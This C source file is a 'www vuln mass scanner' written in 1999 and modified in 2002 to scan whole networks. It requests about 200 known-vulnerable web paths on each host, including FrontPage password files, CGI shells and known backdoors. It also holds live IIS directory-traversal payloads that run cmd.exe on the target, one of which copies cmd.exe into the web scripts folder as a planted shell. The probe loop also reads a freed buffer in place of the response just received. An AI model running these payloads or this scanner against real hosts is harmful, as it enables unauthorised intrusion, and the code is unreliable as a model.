/*
 * www vuln mass scanner
 *
 * by elux - [ http://peter.eluks.com ]
 * December 29, 1999
 *
 * modified - Matthew [ http://www.isux.com/ ]
 * 4th November, 2002
 *
 * This is a vulnerability scanner for www modules.  This 
 * includes cgi or other types of programs that run off httpd.
 * It's fairly simple to use and gets the job done.  Enjoy.
 * 
 * This is now incorporated into my code and can be used to
 * scan networks.
 *
 */

/* Debug Header */
#if DEBUG
# define IFDEBUG(x) do { if (debug) x; }while(0)
# define IFDEBUG5(x) do { if (debug) x; }while(0)
#else
# define IFDEBUG(x)
# define IFDEBUG5(x)
#endif
/* End Debug Header */

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <fcntl.h>
#include "extern.h"

#define HTTPPORT 80
#define TIMEOUT 10

int probe(char *host, FILE *outfile, double totalpercent);

int debug=5;
int finished=0;

int scan(char *ip, unsigned long int amount, FILE *out) {

	char buf[512];
	double finished = 0.0;
	double equation = 0.0;

	finished++;

	strcpy(buf, ip);
	if(buf[strlen(buf) - 1] == '\n')
		buf[strlen(buf) - 1] = 0;

	if(probe(buf, out, equation) != 0) {
		buf[strlen(buf) + 1] = 0;
		buf[strlen(buf)] = '\n';
		fprintf(stderr, "7");
	}
	equation = (finished / (double)amount) * 100.0;
	printf("\rTotal Completed: [ %.0f%% ]\tCurrent Task: [ 0%% ]  \t%s              \r", equation, ip);
	fflush(stdout);
	fflush(out);
}

int probe(char *host, FILE *outfile, double totalpercent) {
	struct sockaddr_in their_addr;
	int sockfd, count, size = 4096, numbytes;
	struct hostent *he;
	char *httpversion, *sendstr = (char *)malloc(size), *vulnstr = "200 OK";
	char *name[500], *vulnlist[500];
	char *verbuf, *buf;
 	int amount = 205;
	int con;
	fd_set fdw, fdr;
	struct timeval tv;
	int error=0;
	int err=0;

	vulnlist[0  ] = "[ Frontpage Bugs ]";                              name[0  ] = "[ Frontpage Bugs ]";
	vulnlist[1  ] = "/_vti_bin/shtml.dll";                             name[1  ] = "shtml.dll              ";
	vulnlist[2  ] = "/_vti_bin/shtml.exe";                             name[2  ] = "shtml.exe              ";
	vulnlist[3  ] = "/_vti_inf.html";                                  name[3  ] = "_vti_inf.html          ";
	vulnlist[4  ] = "/_vti_pvt/administrators.pwd";                    name[4  ] = "administrators.pwd     ";
	vulnlist[5  ] = "/_vti_pvt/authors.pwd";                           name[5  ] = "authors.pwd            ";
	vulnlist[6  ] = "/_vti_pvt/service.pwd";                           name[6  ] = "service.pwd            ";
	vulnlist[7  ] = "/_vti_pvt/service.grp";                           name[7  ] = "service.grp            ";
	vulnlist[8  ] = "/_vti_pvt/users.pwd";                             name[8  ] = "users.pwd              ";
	vulnlist[9  ] = "[ Coldfusion Bugs ]";                             name[9  ] = "[ Coldfusion Bugs ]";
	vulnlist[10 ] = "/cfappman/index.cfm";                             name[10 ] = "index.cfm              ";
	vulnlist[11 ] = "/cfdocs/cfmlsyntaxcheck.cfm";                     name[11 ] = "cfmlsyntaxcheck.cfm    ";
	vulnlist[12 ] = "/cfdocs/exampleapp/docs/sourcewindow.cfm";        name[12 ] = "sourcewindow.cfm       ";
	vulnlist[13 ] = "/cfdocs/examples/cvbeans/beaninfo.cfm";           name[13 ] = "beaninfo.cfm           ";
	vulnlist[14 ] = "/cfdocs/examples/httpclient/mainframeset.cfm";    name[14 ] = "mainframeset.cfm       ";
	vulnlist[15 ] = "/cfdocs/examples/parks/detail.cfm";               name[15 ] = "detail.cfm             ";
	vulnlist[16 ] = "/cfdocs/expeval/displayopenedfile.cfm";           name[16 ] = "displayopenedfile.cfm  ";
	vulnlist[17 ] = "/cfdocs/expeval/exprcalc.cfm";                    name[17 ] = "exprcalc.cfm           ";
	vulnlist[18 ] = "/cfdocs/expeval/openfile.cfm";                    name[18 ] = "openfile.cfm           ";
	vulnlist[19 ] = "/cfdocs/expeval/sendmail.cfm";                    name[19 ] = "sendmail.cfm           ";
	vulnlist[20 ] = "/cfdocs/snippets/evaluate.cfm";                   name[20 ] = "evaluate.cfm           ";
	vulnlist[21 ] = "/cfdocs/snippets/fileexists.cfm";                 name[21 ] = "fileexists.cfm         ";
	vulnlist[22 ] = "/cfdocs/snippets/gettempdirectory.cfm";           name[22 ] = "gettempdirectory.cfm   ";
	vulnlist[23 ] = "/cfdocs/snippets/viewexample.cfm";                name[23 ] = "viewexample.cfm        ";
	vulnlist[24 ] = "[ Windows NT Bugs ]";                             name[24 ] = "[ Windows NT Bugs ]";
	vulnlist[25 ] = "/....../autoexec.bat";                            name[25 ] = "autoexec.bat           ";
	vulnlist[26 ] = "/?PageServices";                                  name[26 ] = "?PageServices          ";
	vulnlist[27 ] = "/_AuthChangeUrl?";                                name[27 ] = "_AuthChangeUrl?        ";
	vulnlist[28 ] = "/adsamples/config/site.csc";                      name[28 ] = "site.csc               ";
	vulnlist[29 ] = "/cgi-dos/args.bat";                               name[29 ] = "args.bat               ";
	vulnlist[30 ] = "/cgi-dos/args.cmd";                               name[30 ] = "args.cmd               ";
	vulnlist[31 ] = "/cgi-shl/win-c-sample.exe";                       name[31 ] = "win-c-sample.exe       ";
    vulnlist[32 ] = "/cgi-win/uploader.exe";                           name[32 ] = "uploader.exe           ";
    vulnlist[33 ] = "/domcfg.nsf/?open";                               name[33 ] = "?open                  ";
    vulnlist[34 ] = "[ Admin path Bugs ]";                             name[34 ] = "[ Admin path Bugs ]";
    vulnlist[35 ] = "/iisadmpwd/achg.htr";                             name[35 ] = "achg.htr               ";
    vulnlist[36 ] = "/iisadmpwd/aexp.htr";                             name[36 ] = "aexp.htr               ";
    vulnlist[37 ] = "/iisadmpwd/aexp2.htr";                            name[37 ] = "aexp2.htr              ";
    vulnlist[38 ] = "/iisadmpwd/aexp2b.htr";                           name[38 ] = "aexp2b.htr             ";
    vulnlist[39 ] = "/iisadmpwd/aexp3.htr";                            name[39 ] = "aexp3.htr              ";
    vulnlist[40 ] = "/iisadmpwd/aexp4.htr";                            name[40 ] = "aexp4.htr              ";
    vulnlist[41 ] = "/iisadmpwd/aexp4b.htr";                           name[41 ] = "aexp4b.htr             ";
    vulnlist[42 ] = "/iisadmpwd/anot.htr";                             name[42 ] = "anot.htr               ";
    vulnlist[43 ] = "/iisadmpwd/anot3.htr";                            name[43 ] = "anot3.htr              ";
    vulnlist[44 ] = "[ ODBC Bugs ]";                                   name[44 ] = "[ ODBC Bugs ]";
    vulnlist[45 ] = "/msadc/Samples/SELECTOR/showcode.asp";            name[45 ] = "SELECTOR/showcode.asp  ";
    vulnlist[46 ] = "/msadc/msadcs.dll";                               name[46 ] = "msadcs.dll             ";
    vulnlist[47 ] = "/msads/samples/selector/showcode.asp";            name[47 ] = "selector/showcode.asp  ";
    vulnlist[48 ] = "/scripts/CGImail.exe";                            name[48 ] = "CGImail.exe            ";
    vulnlist[49 ] = "/scripts/convert.bas";                            name[49 ] = "convert.bas            ";
    vulnlist[50 ] = "/scripts/cpshost.dll";                            name[50 ] = "cpshost.dll            ";
    vulnlist[51 ] = "/scripts/fpcount.exe";                            name[51 ] = "fpcount.exe            ";
    vulnlist[52 ] = "/scripts/iisadmin/bdir.htr";                      name[52 ] = "bdir.htr               ";
    vulnlist[53 ] = "/scripts/proxy/w3proxy.dll";                      name[53 ] = "w3proxy.dll            ";
    vulnlist[54 ] = "/scripts/samples/ctguestb.idc";                   name[54 ] = "ctguestb.idc           ";
    vulnlist[55 ] = "/scripts/samples/details.idc";                    name[55 ] = "details.idc            ";
    vulnlist[56 ] = "/scripts/tools/getdrvs.exe";                      name[56 ] = "getdrvs.exe            ";
    vulnlist[57 ] = "/scripts/tools/newdsn.exe";                       name[57 ] = "newdsn.exe             ";
    vulnlist[58 ] = "/search97.vts";                                   name[58 ] = "search97.vts           ";
    vulnlist[59 ] = "/session/adminlogin?RCpage=/sysadmin/index.stm";  name[59 ] = "index.stm              ";
    vulnlist[60 ] = "/~root";                                          name[60 ] = "/~root                 ";
    vulnlist[61 ] = "[ Denial of Service Bugs ]";                      name[61 ] = "[ Denial of Service Bugs ]";
    vulnlist[62 ] = "/iissamples/exair/howitworks/codebrws.asp";       name[62 ] = "howitworks/codebrws.asp";
    vulnlist[63 ] = "/iissamples/sdk/asp/docs/codebrws.asp";           name[63 ] = "asp/docs/codebrws.asp  ";
    vulnlist[64 ] = "/cgi-bin/visadmin.exe";                           name[64 ] = "visadmin.exe           ";
    vulnlist[65 ] = "/scripts/../../cmd.exe";                          name[65 ] = "cmd.exe                ";
    vulnlist[66 ] = "/secure/.htaccess";                               name[66 ] = "/secure/.htaccess      ";
    vulnlist[67 ] = "/secure/.wwwacl";                                 name[67 ] = "/secure/.wwwacl        ";
    vulnlist[68 ] = "[ CGI Bugs ]";                                    name[68 ] = "[ CGI Bugs ]";
    vulnlist[69 ] = "/cgi-bin/AT-admin.cgi";                           name[69 ] = "AT-admin.cgi           ";
    vulnlist[70 ] = "/cgi-bin/AnyForm";                                name[70 ] = "AnyForm                ";
    vulnlist[71 ] = "/cgi-bin/AnyForm2";                               name[71 ] = "AnyForm2               ";
    vulnlist[72 ] = "/cgi-bin/Count.cgi";                              name[72 ] = "Count.cgi              ";
    vulnlist[73 ] = "/cgi-bin/LWGate";                                 name[73 ] = "LWGate                 ";
    vulnlist[74 ] = "/cgi-bin/LWGate.cgi";                             name[74 ] = "LWGate.cgi             ";
    vulnlist[75 ] = "/cgi-bin/MachineInfo";                            name[75 ] = "MachineInfo            ";
    vulnlist[76 ] = "/cgi-bin/aglimpse";                               name[76 ] = "aglimpse               ";
    vulnlist[77 ] = "/cgi-bin/archie";                                 name[77 ] = "archie                 ";
    vulnlist[78 ] = "/cgi-bin/architext_query.pl";                     name[78 ] = "architext_query.pl     ";
    vulnlist[79 ] = "/cgi-bin/ash";                                    name[79 ] = "ash                    ";
    vulnlist[80 ] = "/cgi-bin/bash";                                   name[80 ] = "bash                   ";
    vulnlist[81 ] = "/cgi-bin/bb-hist.sh";                             name[81 ] = "bb-hist.sh             ";
    vulnlist[82 ] = "/cgi-bin/bnbform";                                name[82 ] = "bnbform                ";
    vulnlist[83 ] = "/cgi-bin/bnbform.cgi";                            name[83 ] = "bnbform.cgi            ";
    vulnlist[84 ] = "/cgi-bin/calendar";                               name[84 ] = "calendar               ";
    vulnlist[85 ] = "/cgi-bin/campas";                                 name[85 ] = "compas                 ";
    vulnlist[86 ] = "/cgi-bin/carbo.dll";                              name[86 ] = "carbo.dll              ";
    vulnlist[87 ] = "/cgi-bin/cgimail.exe";                            name[87 ] = "cgimail.exe            ";
    vulnlist[88 ] = "/cgi-bin/cgiwrap";                                name[88 ] = "cgiwrap                ";
    vulnlist[89 ] = "/cgi-bin/classified.cgi";                         name[89 ] = "classified.cgi         ";
    vulnlist[90 ] = "/cgi-bin/classifieds";                            name[90 ] = "classifieds            ";
    vulnlist[91 ] = "/cgi-bin/classifieds.cgi";                        name[91 ] = "classifieds.cgi        ";
    vulnlist[92 ] = "/cgi-bin/count.cgi";                              name[92 ] = "count.cgi              ";
    vulnlist[93 ] = "/cgi-bin/csh";                                    name[93 ] = "csh                    ";
    vulnlist[94 ] = "/cgi-bin/date";                                   name[94 ] = "date                   ";
    vulnlist[95 ] = "/cgi-bin/day5datacopier.cgi";                     name[95 ] = "day5datacopier.cgi     ";
    vulnlist[96 ] = "/cgi-bin/day5datanotifier.cgi";                   name[96 ] = "day5datanotifier.cgi   ";
    vulnlist[97 ] = "/cgi-bin/download.cgi";                           name[97 ] = "download.cgi           ";
    vulnlist[98 ] = "/cgi-bin/dumpenv.pl";                             name[98 ] = "dumpenv.pl             ";
    vulnlist[99 ] = "/cgi-bin/edit.pl";                                name[99 ] = "edit.pl                ";
    vulnlist[100] = "/cgi-bin/environ.cgi";                            name[100] = "environ.cgi            ";
    vulnlist[101] = "/cgi-bin/faxsurvey";                              name[101] = "faxsurvey              ";
    vulnlist[102] = "/cgi-bin/filemail";                               name[102] = "filemail               ";
    vulnlist[103] = "/cgi-bin/filemail.pl";                            name[103] = "filemail.pl            ";
    vulnlist[104] = "/cgi-bin/files.pl";                               name[104] = "files.pl               ";
    vulnlist[105] = "/cgi-bin/finger";                                 name[105] = "finger                 ";
    vulnlist[106] = "/cgi-bin/finger.cgi";                             name[106] = "finger.cgi             ";
    vulnlist[107] = "/cgi-bin/finger.pl";                              name[107] = "finger.pl              ";
    vulnlist[108] = "/cgi-bin/flexform";                               name[108] = "flexform               ";
    vulnlist[109] = "/cgi-bin/flexform.cgi";                           name[109] = "flexform.cgi           ";
    vulnlist[110] = "/cgi-bin/formmail.pl";                            name[110] = "formmail.pl            ";
    vulnlist[111] = "/cgi-bin/fortune";                                name[111] = "fortune                ";
    vulnlist[112] = "/cgi-bin/glimpse";                                name[112] = "glimpse                ";
    vulnlist[113] = "/cgi-bin/guestbook.cgi";                          name[113] = "guestbook.cgi          ";
    vulnlist[114] = "/cgi-bin/handler";                                name[114] = "handler                ";
    vulnlist[115] = "/cgi-bin/handler.cgi";                            name[115] = "handler.cgi            ";
    vulnlist[116] = "/cgi-bin/htmlscript";                             name[116] = "htmlscript             ";
    vulnlist[117] = "/cgi-bin/info2www";                               name[117] = "info2www               ";
    vulnlist[118] = "/cgi-bin/jj";                                     name[118] = "jj                     ";
    vulnlist[119] = "/cgi-bin/ksh";                                    name[119] = "ksh                    ";
    vulnlist[120] = "/cgi-bin/lwgate";                                 name[120] = "lwgate                 ";
    vulnlist[121] = "/cgi-bin/lwgate.cgi";                             name[121] = "lwgate.cgi             ";
    vulnlist[122] = "/cgi-bin/mail";                                   name[122] = "mail                   ";
    vulnlist[123] = "/cgi-bin/maillist.pl";                            name[123] = "maillist.pl            ";
    vulnlist[124] = "/cgi-bin/man.sh";                                 name[124] = "man.sh                 ";
    vulnlist[125] = "/cgi-bin/mlog.phtml";                             name[125] = "mlog.phtml             ";
    vulnlist[126] = "/cgi-bin/mylog.phtml";                            name[126] = "mylog.phtml            ";
    vulnlist[127] = "/cgi-bin/nlog-smb.pl";                            name[127] = "nlog-smb.pl            ";
    vulnlist[128] = "/cgi-bin/nph-error.pl";                           name[128] = "nph-error.pl           ";
    vulnlist[129] = "/cgi-bin/nph-publish";                            name[129] = "nph-publish            ";
    vulnlist[130] = "/cgi-bin/nph-test-cgi";                           name[130] = "nph-test-cgi           ";
    vulnlist[131] = "/cgi-bin/passwd";                                 name[131] = "passwd                 ";
    vulnlist[132] = "/cgi-bin/passwd.txt";                             name[132] = "passwd.txt             ";
    vulnlist[133] = "/cgi-bin/password";                               name[133] = "password               ";
    vulnlist[134] = "/cgi-bin/password.txt";                           name[134] = "password.txt           ";
    vulnlist[135] = "/cgi-bin/perl";                                   name[135] = "perl                   ";
    vulnlist[136] = "/cgi-bin/perl.exe";                               name[136] = "perl.exe               ";
    vulnlist[137] = "/cgi-bin/perlshop.cgi";                           name[137] = "perlshop.cgi           ";
    vulnlist[138] = "/cgi-bin/pfdisplay.cgi";                          name[138] = "pfdisplay.cgi          ";
    vulnlist[139] = "/cgi-bin/phf";                                    name[139] = "phf                    ";
    vulnlist[140] = "/cgi-bin/phf.cgi";                                name[140] = "phf.cgi                ";
    vulnlist[141] = "/cgi-bin/phf.pp";                                 name[141] = "phf.pp                 ";
    vulnlist[142] = "/cgi-bin/php";                                    name[142] = "php                    ";
    vulnlist[143] = "/cgi-bin/php.cgi";                                name[143] = "php.cgi                ";
    vulnlist[144] = "/cgi-bin/post-query";                             name[144] = "post-query             ";
    vulnlist[145] = "/cgi-bin/ppdscgi.exe";                            name[145] = "ppdscgi.exe            ";
    vulnlist[146] = "/cgi-bin/query";                                  name[146] = "query                  ";
    vulnlist[147] = "/cgi-bin/redirect";                               name[147] = "redirect               ";
    vulnlist[148] = "/cgi-bin/rguest.exe";                             name[148] = "rguest.exe             ";
    vulnlist[149] = "/cgi-bin/rksh";                                   name[149] = "rksh                   ";
    vulnlist[150] = "/cgi-bin/rsh";                                    name[150] = "rsh                    ";
    vulnlist[151] = "/cgi-bin/rwwwshell.pl";                           name[151] = "THC Backdoor           ";
    vulnlist[152] = "/cgi-bin/sam._";                                  name[152] = "sam._                  ";
    vulnlist[153] = "/cgi-bin/search97.vts";                           name[153] = "search97.vts           ";
    vulnlist[154] = "/cgi-bin/sendform.cgi";                           name[154] = "sendform.cgi           ";
    vulnlist[155] = "/cgi-bin/sh";                                     name[155] = "sh                     ";
    vulnlist[156] = "/cgi-bin/snorkerz.bat";                           name[156] = "snorkerz.bat           ";
    vulnlist[157] = "/cgi-bin/snorkerz.cmd";                           name[157] = "snorkerz.cmd           ";
    vulnlist[158] = "/cgi-bin/survey";                                 name[158] = "survey                 ";
    vulnlist[159] = "/cgi-bin/survey.cgi";                             name[159] = "survey.cgi             ";
    vulnlist[160] = "/cgi-bin/tcsh";                                   name[160] = "tcsh                   ";
    vulnlist[161] = "/cgi-bin/test-cgi";                               name[161] = "test-cgi               ";
    vulnlist[162] = "/cgi-bin/test-cgi.tcl";                           name[162] = "test-cgi.tcl           ";
    vulnlist[163] = "/cgi-bin/test-env";                               name[163] = "test-env               ";
    vulnlist[164] = "/cgi-bin/textcounter.pl";                         name[164] = "textcounter.pl         ";
    vulnlist[165] = "/cgi-bin/unlg1.1";                                name[165] = "Un1g Backdoor          ";
    vulnlist[166] = "/cgi-bin/upload.pl";                              name[166] = "upload.pl              ";
    vulnlist[167] = "/cgi-bin/uptime";                                 name[167] = "uptime                 ";
    vulnlist[168] = "/cgi-bin/view-source";                            name[168] = "view-source            ";
    vulnlist[169] = "/cgi-bin/w3-msql";                                name[169] = "w3-msql                ";
    vulnlist[170] = "/cgi-bin/w3tvars.pm";                             name[170] = "w3tvars.pm             ";
    vulnlist[171] = "/cgi-bin/wais.pl";                                name[171] = "wais.pl                ";
    vulnlist[172] = "/cgi-bin/webdist.cgi";                            name[172] = "webdist.cgi            ";
    vulnlist[173] = "/cgi-bin/webgais";                                name[173] = "webgais                ";
    vulnlist[174] = "/cgi-bin/webmap.cgi";                             name[174] = "webmap.cgi             ";
    vulnlist[175] = "/cgi-bin/websendmail";                            name[175] = "websendmail            ";
    vulnlist[176] = "/cgi-bin/wguest.exe";                             name[176] = "wguest.exe             ";
    vulnlist[177] = "/cgi-bin/whois_raw.cgi";                          name[177] = "whois_raw.cgi          ";
    vulnlist[178] = "/cgi-bin/wrap";                                   name[178] = "wrap                   ";
    vulnlist[179] = "/cgi-bin/www-sql";                                name[179] = "www-sql                ";
    vulnlist[180] = "/cgi-bin/wwwadmin.pl";                            name[180] = "wwwadmin.pl            ";
    vulnlist[181] = "/cgi-bin/wwwboard.pl";                            name[181] = "wwwboard.pl            ";
    vulnlist[182] = "/cgi-bin/zsh";                                    name[182] = "zsh                    ";
    vulnlist[183] = "/cgi-bin/webwho.pl";                              name[183] = "webwho.pl              ";
    vulnlist[184] = "/cgi-bin/FormMail.pl";                            name[184] = "FormMail.pl            ";
    vulnlist[185] = "/cgi-bin/formmail.cgi";                           name[185] = "formmail.cgi           ";
    vulnlist[186] = "/cgi-bin/FormMail.cgi";                           name[186] = "FormMail.cgi           ";
    vulnlist[187] = "/cgi-bin/formmail";                               name[187] = "formmail               ";
    vulnlist[188] = "/cgi-bin/FormMail";                               name[188] = "FormMail               ";
		vulnlist[189] = "/scripts/..%255c../winnt/system32/cmd.exe";       name[189] = "Nimba/Code Red               ";
		vulnlist[190] = "/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir";                                                    name[190] = "Nimba/Code Red               ";
		vulnlist[191] = "/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir";                                                    name[191] = "Nimba/Code Red               ";
		vulnlist[192] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe";      name[192] = "Nimba/Code Red               ";
		vulnlist[193] = "/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir";                                                                     name[193] = "Nimba/Code Red               ";
		vulnlist[194] = "/scripts/..%252f../winnt/system32/cmd.exe?/c+dir";                                                                         name[194] = "Nimba/Code Red               ";
		vulnlist[195] = "/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir";                                                                       name[195] = "Nimba/Code Red               ";
		vulnlist[196] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir";                                                                        name[196] = "Nimba/Code Red               ";
		vulnlist[197] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir";                                                                        name[197] = "Nimba/Code Red               ";
		vulnlist[198] = "/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir";                                                                        name[198] = "Nimba/Code Red               ";
		vulnlist[199] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir";                                                                        name[199] = "Nimba/Code Red               ";
		vulnlist[200] = "/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir";                        name[200] = "Nimba/Code Red               ";
		vulnlist[201] = "/d/winnt/system32/cmd.exe?/c+dir";                                                                                         name[201] = "Nimba/Code Red               ";
		vulnlist[202] = "/c/winnt/system32/cmd.exe?/c+dir";                                                                                         name[202] = "Nimba/Code Red               ";
		vulnlist[203] = "/scripts/root.exe?/c+dir";                                                                                                 name[203] = "Nimba/Code Red               ";
		vulnlist[204] = "/MSADC/root.exe?/c+dir";                                                                                                   name[204] = "Nimba/Code Red               ";
		vulnlist[205] = NULL;

	sockfd=net_connect(host, HTTPPORT, &err);
	if (sockfd) {
   	fprintf(outfile, "\n\n====================[ %s WWW Vuln Report ]====================\n", host);
	} else {
		if (err)
			fprintf(outfile, "\n====================[ %s does not have a running HTTP Server ]====================", host);
		else
			fprintf(outfile, "\n====================[ Connection to %s/32 timed out ]========================", host);
   	return(0);
 	}

	if (net_nsend(sockfd, "GET / HTTP/1.0\r\n\r\n", 18)) {
		
		verbuf=net_read(sockfd);
		numbytes=verbuf?strlen(verbuf):(int)verbuf;
		numbytes=numbytes<100?numbytes:100;

		if(numbytes) {
 			verbuf[numbytes] = '\0';
			fprintf(outfile, "Httpd version of %s is:\n\n", host);
			fprintf(outfile, "%s\n\n", verbuf);
			free(verbuf);
		} else {
			fprintf(outfile, "Nothing Read from %s!\n", host);
		}
	} else {
		fprintf(outfile, "Unable to write to %s!\n", host);
	}
	fflush(outfile);
	close(sockfd);

 	for(count = 0; vulnlist[count] ; count++) {
 		if(count == 0 || count == 9 || count == 24 || count == 34 || count == 44 || count == 61\
                                        || count == 68)
			fprintf(outfile, "%s\n", name[count]);
		else {
			sockfd=net_connect(host, HTTPPORT, &err);
			snprintf(sendstr, size, "GET %s HTTP/1.0\r\n\r\n\0", vulnlist[count]);
			if (net_nsend(sockfd, sendstr, strlen(sendstr))) {
				buf=net_read(sockfd);
				numbytes=verbuf?strlen(verbuf):(int)verbuf;
				numbytes=numbytes<100?numbytes:100;

				if(numbytes) {
					buf[numbytes] = '\0';

					if((strstr(buf, vulnstr)) != NULL) {
						fprintf(outfile, "%s : Found!\n", name[count]);
					}
					free(buf);
				} else {
					fprintf(outfile, "Unable to read from %s!\n", host);
				} 
			} else {
				fprintf(outfile, "Unable to write to: %s!\n", host);
			}
			close(sockfd);
		}
	printf("\rTotal Completed: [ %.0f%% ]\tCurrent Task: [ %.0f%% ]  \r", \
                      totalpercent, ((double)count / (double)amount) * 100.0);
	fflush(outfile);
 	fflush(stdout);
	}
	return(1);
}
